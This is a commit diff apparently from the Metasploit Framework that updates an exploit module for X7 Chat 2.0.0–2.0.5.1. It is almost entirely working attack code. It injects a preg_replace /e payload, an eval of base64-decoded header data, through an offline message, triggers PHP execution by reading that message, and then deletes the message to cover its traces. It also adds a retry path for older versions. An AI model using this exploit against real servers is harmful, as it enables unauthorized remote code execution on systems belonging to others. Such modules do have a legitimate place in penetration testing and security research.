Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04

itsecurityco · itsecurityco · commit 7e4248b601b9 · 2014-11-03T16:42:50.000-05:00
diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,8 +15,9 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat versions 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
-        This allows execute PHP code in the remote machine.
+        This module exploits a post-auth vulnerability found in X7 Chat versions 2.0.0 up to 2.0.5.1.
+        Library lib/message.php uses preg_replace() function with the /e modifier.
+        This allows a remote authenticated attacker to execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -50,20 +51,20 @@ def check
 
   def exec_php(php_code, check = false)
 
-    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
-    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
-    rand_text = Rex::Text.rand_text_alpha(5, 8)
-
-    # remove comments, line breaks and spaces
-    praw = php_code.gsub(/(\s+)|(#.*)/, '')
+    # remove comments, line breaks and spaces of php_code
+    pclean = php_code.gsub(/(\s+)|(#.*)/, '')
 
-    # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
-    while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
-      praw = "#{ praw } "
+    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
+    while Rex::Text.encode_base64(pclean) =~ /=/
+      pclean = "#{ pclean } "
     end
+    pb64 = Rex::Text.encode_base64(pclean)
 
-    pb64 = Rex::Text.encode_base64(praw)
+    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
+    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
+    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
 
+    print_status("Trying for version 2.0.2 up to 2.0.5.1")
     print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
     res = send_request_cgi({
       'method'   => 'GET',
@@ -72,26 +73,56 @@ def exec_php(php_code, check = false)
         'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
-        'act'     => 'userpanel',
+        # value compatible with 2.0.2 up to 2.0.5.1
+        'act'     => 'user_cp',
         'cp_page' => 'msgcenter',
         'to'      => datastore['USERNAME'],
         'subject' => rand_text,
-        'body'    => "#{ rand_text }www.${eval(base64_decode(getallheaders()[#{ rand_text }]))}.c#{ rand_text }",
+        'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
       }
     })
 
-    if res && res.code == 200
-      print_good("Message (#{ rand_text }) sent successfully")
-    else
+    if !res || res.code != 200
       print_error("Sending the message (#{ rand_text }) has failed")
       return
     end
 
-    if res && res.body =~ /([0-9]*)">#{ rand_text }/
+    if res.body =~ /([0-9]*)">#{ rand_text }/
       message_id = Regexp.last_match[1]
+      userpanel = 'user_cp'
     else
       print_error("Could not find message (#{ rand_text }) in the message list")
-      return
+
+      print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
+      print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'index.php'),
+        'headers'  => {
+          'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
+        },
+        'vars_get' => {
+          # value compatible with 2.0.0 up to 2.0.1 a1
+          'act'     => 'usercp',
+          'cp_page' => 'msgcenter',
+          'to'      => datastore['USERNAME'],
+          'subject' => rand_text,
+          'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
+        }
+      })
+
+      if !res || res.code != 200
+        print_error("Sending the message (#{ rand_text }) has failed")
+        return
+      end
+
+      if res.body =~ /([0-9]*)">#{ rand_text }/
+        message_id = Regexp.last_match[1]
+        userpanel = 'usercp'
+      else
+        print_error("Could not find message (#{ rand_text }) in the message list")
+        return
+      end
     end
 
     print_status("Accessing message (#{ rand_text })")
@@ -104,9 +135,9 @@ def exec_php(php_code, check = false)
         rand_text => pb64,
       },
       'vars_get'  => {
-        'act'     => 'userpanel',
+        'act'     => userpanel,
         'cp_page' => 'msgcenter',
-        'read'    =>  message_id,
+        'read'    => message_id,
       }
     })
 
@@ -120,9 +151,9 @@ def exec_php(php_code, check = false)
         'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
-        'act'     => 'userpanel',
+        'act'     => userpanel,
         'cp_page' => 'msgcenter',
-        'delete'  =>  message_id,
+        'delete'  => message_id,
       }
     })
 
